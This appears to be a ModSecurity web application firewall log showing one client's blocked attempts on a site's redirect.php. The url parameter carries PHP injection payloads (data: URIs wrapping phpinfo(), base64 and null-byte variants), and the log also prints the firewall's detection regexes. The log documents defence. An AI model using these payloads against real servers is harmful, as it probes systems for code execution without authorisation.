[Tue May 12 05:32:47.762756 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:url: data:text/plain,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigqAAAAFU"]
[Tue May 12 05:32:47.763033 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:text/plain, found within ARGS:url: data:text/plain,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigqAAAAFU"]
[Tue May 12 05:32:47.763438 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigqAAAAFU"]
[Tue May 12 05:32:47.763688 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigqAAAAFU"]
[Tue May 12 05:32:47.902130 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigqQAAAFU"]
[Tue May 12 05:32:47.902181 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigqQAAAFU"]
[Tue May 12 05:32:47.902433 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:url: data:text/plain,<?php phpinfo(); ?>\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigqQAAAFU"]
[Tue May 12 05:32:47.902654 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:text/plain, found within ARGS:url: data:text/plain,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigqQAAAFU"]
[Tue May 12 05:32:47.903065 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigqQAAAFU"]
[Tue May 12 05:32:47.903324 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfX9r1yOh9TvizezigqQAAAFU"]
[Tue May 12 05:32:48.041953 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: ;base64 found within ARGS:url: data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigqgAAAFU"]
[Tue May 12 05:32:48.042059 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:; found within ARGS:url: data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigqgAAAFU"]
[Tue May 12 05:32:48.042466 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigqgAAAFU"]
[Tue May 12 05:32:48.042710 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=10,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigqgAAAFU"]
[Tue May 12 05:32:48.181129 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigqwAAAFU"]
[Tue May 12 05:32:48.181178 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigqwAAAFU"]
[Tue May 12 05:32:48.181596 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: ;base64 found within ARGS:url: data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigqwAAAFU"]
[Tue May 12 05:32:48.181689 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:; found within ARGS:url: data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigqwAAAFU"]
[Tue May 12 05:32:48.182113 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigqwAAAFU"]
[Tue May 12 05:32:48.182355 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=10,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigqwAAAFU"]
[Tue May 12 05:32:48.322041 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: ;base64 found within ARGS:url: data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrAAAAFU"]
[Tue May 12 05:32:48.322141 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data://text/plain;base64 found within ARGS:url: data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrAAAAFU"]
[Tue May 12 05:32:48.322571 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrAAAAFU"]
[Tue May 12 05:32:48.322820 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=10,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrAAAAFU"]
[Tue May 12 05:32:48.461299 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrQAAAFU"]
[Tue May 12 05:32:48.461347 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrQAAAFU"]
[Tue May 12 05:32:48.461727 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: ;base64 found within ARGS:url: data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrQAAAFU"]
[Tue May 12 05:32:48.461815 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data://text/plain;base64 found within ARGS:url: data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrQAAAFU"]
[Tue May 12 05:32:48.462227 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrQAAAFU"]
[Tue May 12 05:32:48.462481 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=10,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrQAAAFU"]
